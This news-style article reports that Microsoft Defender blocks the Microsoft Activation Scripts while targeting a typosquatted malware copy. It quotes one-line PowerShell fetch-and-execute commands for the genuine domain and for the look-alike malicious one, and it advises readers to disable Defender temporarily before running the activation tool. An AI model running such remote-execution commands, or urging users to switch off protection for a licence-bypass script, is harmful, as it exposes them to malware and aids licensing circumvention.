Microsoft is evidently cognizant of the Microsoft Activation Scripts (MAS), a popular open-source utility; moreover, the corporation appears equally aware of adversaries registering deceptive domains to propagate malware under the MAS moniker. Consequently, Microsoft has deployed Microsoft Defender to autonomously intercept these fraudulent activation tools.
Regrettably, an anomaly in Microsoft’s filtering logic has emerged: the authentic MAS utility is now erroneously ensnared by these same defensive measures. As a result, users attempting to execute activation commands via PowerShell are met with abrupt errors. One might question whether this is a deliberate campaign to suppress the genuine tool; however, the logs within Microsoft Defender designate the threat as Trojan:PowerShell/FakeMas.DA!MTB. Given that reports of these counterfeit scripts have only recently surfaced—and were corroborated by the MAS development team on social media—it is highly probable that Microsoft’s intention was to neutralize the imitation rather than the original.
The distinction between the legitimate script and its malicious counterpart hinges upon a single character within the domain:
- The authentic MAS command resides at:
irm https://get.activated.win | iex - The compromised version omits the letter ‘d’:
irm hxxps://get.activate.win | iex
It appears Microsoft inadvertently included the legitimate domain in its blacklist. While a lack of a virtual testing environment precludes an immediate verification of whether the phishing version is successfully blocked, it would be a profound irony if the security software permitted the malware while obstructing the harmless original.
The current predicament dictates that since Microsoft Defender is enabled by default, users must navigate to the Security Center to temporarily suspend these protections before proceeding with activation. Once the process is finalized, the defensive layers should be promptly reinstated.
It is paramount to emphasize that one must exercise extreme vigilance regarding the domain name. Disabling security protocols while simultaneously executing a phishing script would leave the system defenseless against malware, potentially culminating in catastrophic data breaches or other security compromises.